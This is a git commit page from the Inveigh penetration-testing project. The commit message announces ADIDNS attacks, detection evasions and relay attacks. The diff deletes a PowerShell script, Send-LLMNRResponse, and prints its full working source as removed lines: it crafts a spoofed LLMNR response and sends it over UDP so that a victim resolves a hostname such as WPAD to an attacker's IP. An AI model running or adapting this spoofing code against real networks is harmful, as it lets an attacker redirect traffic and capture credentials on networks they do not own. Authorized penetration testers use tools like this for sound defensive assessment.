authorKevin Robertson <robertsonk@gmail.com>2018-09-25 14:46:02 -0400
committerKevin Robertson <robertsonk@gmail.com>2018-09-25 14:46:02 -0400
commitc9809376e0afb613b3331a79c8ac83c7f48c679a (patch)
treea7b7a36114fb51ea28c4201d838f896aa10427ab /Extras/Send-LLMNRResponse.ps1
parenta2553ac147ceddb23bb85f3e37f9b82c626b6e38 (diff)
Inveigh 1.41.4
Inveigh: Added ADIDNS attacks. New detection evasions. Inveigh Relay: Added session and enumerate attacks. Added ability to handle multiple targets with target selection based on the enumerate attack and/or BloodHound imports.
Diffstat (limited to 'Extras/Send-LLMNRResponse.ps1')
-rw-r--r--Extras/Send-LLMNRResponse.ps187
1 files changed, 0 insertions, 87 deletions
diff --git a/Extras/Send-LLMNRResponse.ps1 b/Extras/Send-LLMNRResponse.ps1
deleted file mode 100644
index cc22091..0000000
--- a/Extras/Send-LLMNRResponse.ps1
+++ /dev/null
@@ -1,87 +0,0 @@
-
-function Send-LLMNRResponse
-{
-<#
-.SYNOPSIS
-Send-LLMNRResponse sends a crafted LLMNR response packet to a specific target. For name resolution to be successful,
-the specified TargetIP, TargetPort, Hostname, and TransactionID must match a very (very very) recent LLMNR request.
-You must have an external method (wireshark,etc) of viewing the required LLMNR request fields for traffic on the
-target subnet. The odds of pulling this attack off manually are slim if not impossible due to the narrow response
-window. Ideally, this function would be fed by another script.
-
-.PARAMETER Hostname
-Default = WPAD: Specify a hostname for NBNS spoofing.
-
-.PARAMETER LLMNRTTL
-Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
-
-.PARAMETER SendPort
-Default = Random Available: Specify a source port for the LLMNR response. Note that the standard port is 5355
-which will cause a binding conflict if LLMNR is enabled on the host system. A random port seems to work fine.
-
-.PARAMETER SpooferIP
-Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system
-other than the function host.
-
-.PARAMETER TargetIP
-Specify an IP address to target for the LLMNR response.
-
-.PARAMETER TargetPort
-Specify an port to target for the LLMNR response. This port must match the source port included in the request.
-
-.EXAMPLE
-Send-LLMNRResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e
-
-.LINK
-https://github.com/Kevin-Robertson/Inveigh
-#>
-
-
-[CmdletBinding()]
-param
-(
-[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
-[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="",
-[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="",
-[parameter(Mandatory=$true)][String]$Hostname = "",
-[parameter(Mandatory=$true)][Int]$TargetPort="",
-[parameter(Mandatory=$false)][Int]$SendPort="0",
-[parameter(Mandatory=$false)][Int]$LLMNRTTL="30",
-[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if ($invalid_parameter)
-{
- throw "$($invalid_parameter) is not a valid parameter."
-}
-
-if(!$SpooferIP)
-{
- $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
-}
-
-$hostname_bytes = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
-$LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
-[Array]::Reverse($LLMNR_TTL_bytes)
-$Transaction_ID_encoded = $TransactionID.Insert(2,'-')
-$Transaction_ID_bytes = $Transaction_ID_encoded.Split('-') | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
-$LLMNR_response_packet = $Transaction_ID_bytes +
- 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
- $hostname_bytes.Count +
- $hostname_bytes +
- 0x00,0x00,0x01,0x00,0x01 +
- $hostname_bytes.Count +
- $hostname_bytes +
- 0x00,0x00,0x01,0x00,0x01 +
- $LLMNR_TTL_bytes +
- 0x00,0x04 +
- ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
-
-$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort)
-$destination_IP = [System.Net.IPAddress]::Parse($TargetIP)
-$destination_point = New-Object Net.IPEndpoint($destination_IP,$TargetPort)
-$send_socket.Connect($destination_point)
-$send_socket.Send($LLMNR_response_packet,$LLMNR_response_packet.Length)
-$send_socket.Close()
-}
\ No newline at end of file